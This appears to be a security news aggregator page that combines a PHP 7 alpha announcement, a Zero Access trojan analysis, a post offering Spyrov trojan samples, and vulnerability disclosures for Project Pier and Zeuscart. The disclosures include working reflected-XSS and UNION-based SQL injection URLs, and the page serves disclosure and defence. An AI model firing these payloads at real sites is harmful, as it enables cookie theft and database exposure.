Search the Community

The PHP development team announces the immediate availability of PHP 7.0.0 Alpha 1. This release marks the beginning of the PHP 7 major series. All users of PHP are encouraged to test this version carefully, and report any bugs and incompatibilities in the bug tracking system. THIS IS A DEVELOPMENT PREVIEW - DO NOT USE IT IN PRODUCTION! PHP 7.0.0 Alpha 1 comes with new version of the Zend Engine with features such as (incomplete list): Improved performance: PHP 7 is up to twice as fast as PHP 5.6 Consistent 64-bit support Many fatal errors are now Exceptions Removal of old and unsupported SAPIs and extensions The null coalescing operator (??) Combined comparison Operator (<=>) Scalar Type Declarations Anonymous Classes For more information on the new features and other changes, you can read the NEWS file or the or the UPGRADING file for a complete list of upgrading notes. These files can also be found in the release archive. For source downloads of PHP 7.0.0 Alpha 1 please visit the download page, Windows binaries can be found on windows.php.net/qa/. The second alpha will be released on 25th of June. You can also read the full list of planned releases on our wiki. Thank you for helping us making PHP better. Source

Hi, hadn't any time to take a closer look at it. Maybe someone is interested in this malware. Description can be found here: Win32/TrojanDownloader.Spyrov.A | ESET Virusradar Attached: Win32/TrojanDownloader.Spyrov.A samples Download Pass: infected Source

The Zero Access trojan (Maxx++, Sierief, Crimeware) has affected millions of computers worldwide, and it is the number one cause of cyber click fraud and Bitcoin mining on the Internet. Once the trojan has been delivered into the system, it begins to download many other types of malware that can each cause a great deal of damage to an organization. The trojan’s primary infection vector is spam mail and exploits kits, but it can also be distributed by P2P file sharing services and fake cracks and keygens. The trojan is unique in the fact that it connects to a P2P botnet chain that makes it very difficult to dismantle the botnet as a whole. Zero Access is a trojan root kit that uses advanced cloaking mechanisms to evade detection and capture. It has the ability to hide itself from several types of antivirus software and its presence in the system is extremely difficult to ascertain. It leaves no trace evidence indicating a data breach, and the network communications continue to occur as from a legitimate system process. Usually the executable file will reside in the %TEMP% directory of the workstation, and the traffic to external websites will be encoded HTTP GET and POST requests. Zero Access, once in the system, can carry out a wide variety of tasks, including: Use the infected computer for click fraud and Bitcoin mining Open the door to many other types of malware infecting the system Hide itself within the system without being detected Extract victim information including name, hostname, machine name, account name, etc. Analysis Zero Access malware can be downloaded form kernelinfo.com. In this case, the malware was downloaded intentionally for analysis. As in all analysis, the first step is to isolate the affected system. After this, the entire system is scanned for malicious content. At first glance, nothing concrete was found, but on further analysis a file is found in the %TEMP%directory of the infected workstation. An another suspicious file is also found within the %SYSTEM% directory on the workstation. This file appeared to be a configuration file of some kind, and it was protected using ACL permissions. The executable is extracted and run on a sandbox and comes up with confirmation of network indicators. The results also clearly indicate that the file was the dropper component for the Zero Access trojan. The name of the file is found to be fvshis.sav, and the contents of the file are encrypted. The strings of the executable were extracted from the memory and several artifacts were found that confirmed that the dropper received was the 32 bit version of the Max++ dropper component. Later, the dropper component of the trojan was analyzed, and at first glance the file appears to be unpacked. owever, during static analysis it is found that the file is packed using a complex custom packer. The executable also employs a complex anti-debugging scheme to further complicate analysis. The INT 2 signal is an operating system interrupt that allows the program to be debugger aware, i.e the program can detect if it is being analyzed by a debugger and kill itself. This can hinder analysis of such executables. The packing scheme employed by this particular trojan is also very complex, as it makes use of several layers of crypting and packing. It is found that the dropper component makes use of a complex packing scheme. The unpacking scheme works in chunks, with each chunk having a line of anti-debugging code. The dropper will continue to unpack itself in this manner until the entire file has been unpacked. If an analyst tries to break into the cycle with a debugger, the executable will crash the debugger. On much greater efforts, the sample was unpacked, and it was found that the sample attempts to access several directories on the host computer. From the usage of the INT 2 instruction in the code, we realize that the sample is a Ring zero rootkit, i.e it runs in kernel mode. Memory analysis was done on the sample and found that it creates a Mutex in memory. Such Mutexes are used by malware to ensure that the system is not re-infected with the same sample again. It is found that the trojan has injected itself into a legitimate process (explorer.exe) and is using this process to execute its payload. Later, kernel mode artifacts in memory were looked for, and it was found that the malware sample has hidden itself in the system as a kernel module. The trojan disguises itself as a device driver in the kernel memory. The driver is called B48DADF8.sys. Dump this module for further analysis. During preliminary analysis, the suspicious network traffic leaving the infected system was found, and this is analyzed in greater detail. HTTP requests to one domain in particular are also seen. The dropper is clearly trying to contact the above domain to download other malware samples into the infected system, and the domain name was analyzed. The resolved C&C IP address appears to be in Zurich, Switzerland. Swiss law protects the privacy of its citizens to a great extent. This makes it a very popular location for bulletproof hosting providers. Bulletproof hosting is very popular with cybercriminals for hosting their C&C servers. Further analysis into the domain shows that the domain actually maps to 3 different IP addresses including the one given above. All of the domains are in locations with strong privacy laws. We found that all three IP addresses have been blacklisted as malicious: 141.8.225.62 (Switzerland) 199.79.60.109 (Cayman Islands) 208.91.196.109 (Cayman Islands) Although this particular trojan does not steal user information, we found that it generates a large amount of traffic from its click fraud and Bitcoin mining modules. Recommendations Use a firewall to block all incoming connections from the Internet to services that should not be publicly available. By default, you should deny all incoming connections and only allow services you explicitly want to offer to the outside world. Ensure that programs and users of the computer use the lowest level of privileges necessary to complete a task. When prompted for a root or UAC password, ensure that the program asking for administration-level access is a legitimate application. Turn off and remove unnecessary services. By default, many operating systems install auxiliary services that are not critical. These services are avenues of attack. If they are removed, threats have less avenues of attack. Configure your email server to block or remove email that contains file attachments that are commonly used to spread threats, such as .vbs, .bat, .exe, .pif and .scr files. Isolate compromised computers quickly to prevent threats from spreading further. Perform a forensic analysis and restore the computers using trusted media. Do not click suspicious advertisements and banners while browsing the web. Make use of log analysis tools (SIEM) for greater visibility against file and network changes within your organization. Ensure that your antivirus solution is up to date with the latest virus definitions. Ensure that your systems are up to date with the latest available patches, particularly the following vulnerabilities, as this trojan makes use of them to infect systems. CVE-2006-0003 CVE-2008-2992 CVE-2009-0927 CVE-2009-1671 CVE-2009-1672 CVE-2009-4324 CVE-2010-1885 Ensure that your organization uses email gateways to filter spam messages and mails with malicious attachments. Do not click on links in email from unknown sources Do not allow any P2P file sharing software in your corporate network environment. Block traffic to the following addresses in your perimeter devices such as Firewalls and IDS/IPS solutions. 141.8.225.62 208.91.196.109 199.79.60.109 References www.symantec.com Source

I was doing my RASP (Runtime Application Self-Protection) module testing on the latest version of Project Pier i.e. 0.8.8 SP2 yesterday and found an XSS vulnerability in search. http://<server>/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E <http://www.prop.com/public/index.php?c=project&a=search&1427642606&active_project=1&search_for=%3CScRiPt%3Eprompt%28%22This%20website%20has%20simple%20exploitable%20XSS.%22%29%3C%2FScRiPt%3E> The xss occurs after authentication. Thanks, Jaydeep Dave Source

.

Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4 Advisory ID: SROEADV-2015-12 Author: Steffen Rösemann Affected Software: Zeuscart v.4 Vendor URL: http://zeuscart.com/ Vendor Status: pending CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Software used for research: Mac OS X 10.10, Firefox 35.0.1 ========================== Vulnerability Description: ========================== ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities. ================== Technical Details: ================== ==== XSS === Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited for example by crafting a link and make a registered user click on that link. The parameter "search", which is used in the index.php is vulnerable to XSS-attacks. Exploit-Example: http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr" which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter: Exploit-Example: http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php. Exploit-Example: http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E ==== SQLi ==== The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation. By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability: Exploit-Example: http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+ Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter: Exploit-Example: http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+ The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter: http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+ ============== Information Disclosure ============== The administrative backend of Zeuscart v. 4 allows the admin to use a functionality, which displays the PHP-installation settings via phpinfo(): http://{TARGET}/admin/?do=getphpinfo Unfortunately, the PHP-script does not check, if an authorized admin executes this functionality: It is possible even for unregistered users to request the above link to see the informations, phpinfo() displays. That could expose sensitive informations to an attacker which could lead to further exploitation. ========= Solution: ========= Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together. Currently, there is no patch available to secure Zeuscart-installations. ==================== Disclosure Timeline: ==================== 21-Jan-2015 – found the vulnerabilities 21-Jan-2015 - informed the developers (see [3]) 21-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5]) 22-Jan-2015 - vendor responded, provided detailed information 04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3]) 19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond 21-Feb-2015 - release date of this security advisory 21-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://zeuscart.com/ [2] https://github.com/ZeusCart/zeuscart [3] https://github.com/ZeusCart/zeuscart/issues/28 [4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html [5] https://github.com/sroesemann/zeuscart Source

Dependency-Check is a utility that attempts to detect publicly disclosed vulnerabilities contained within project dependencies. It does this by determining if there is a Common Platform Enumeration (CPE) identifier for a given dependency. If found, it will generate a report linking to the associated CVE entries. Documentation and links to production binary releases can be found on the github pages. Additionally, more information about the architecture and ways to extend dependency-check can be found on the wiki. Download: https://github.com/jeremylong/DependencyCheck